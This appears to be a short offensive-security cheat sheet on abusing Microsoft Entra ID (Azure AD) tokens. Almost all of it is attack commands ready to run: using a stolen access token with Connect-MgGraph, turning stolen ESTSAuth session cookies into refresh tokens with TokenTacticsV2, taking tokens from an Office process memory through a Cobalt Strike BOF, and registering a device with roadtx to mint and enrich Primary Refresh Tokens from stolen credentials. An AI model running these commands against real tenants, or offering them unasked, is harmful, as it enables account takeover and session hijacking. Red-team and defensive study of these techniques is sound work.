1.9 KiB
1.9 KiB
Microsoft Entra ID / Azure Active Directory
Access Token
Decode access tokens: jwt.ms
- Use token
# use the jwt $token = "eyJ0eXAiO..." $secure = $token | ConvertTo-SecureString -AsPlainText -Force Connect-MgGraph -AccessToken $secure # whoami Get-MgContext Disconnect-MgGraph
Refresh Token
- Requesting a token using credentials
TODO
Get a Refresh Token from ESTSAuth Cookie
ESTSAuthPersistent is only useful when a CA policy actually grants a persistent session. Otherwise, you should use ESTSAuth.
TokenTacticsV2> Get-AzureTokenFromESTSCookie -ESTSAuthCookie "0.AS8"
TokenTacticsV2> Get-AzureTokenFromESTSCookie -Client MSTeams -ESTSAuthCookie "0.AbcAp.."
Get a Refresh Token from Office process
load bofloader
execute_bof /opt/CS-Remote-OPs-BOF/Remote/office_tokens/office_tokens.x64.o --format-string i 7324
Primary Refresh Token
- Use PRT token
roadtx browserprtauth -prt roadtx.prt -url http://www.office.com
Extract PRT on Device with TPM
- No method known to date.
Generate a PRT by registering a device
roadtx interactiveauth -u user.lastname@domain.local -p password123 -r devicereg
roadtx device -n devicename
roadtx prt -u user.lastname@domain.local -p password123 –-key-pem devicename.key –-cert-pem devicename.pem
roadtx prtenrich –prt roadtx.prt
roadtx prt -u user.lastname@domain.local -p password123 –-key-pem devicename.key –-cert-pem devicename.pem -r 0.AVAApQL<snip>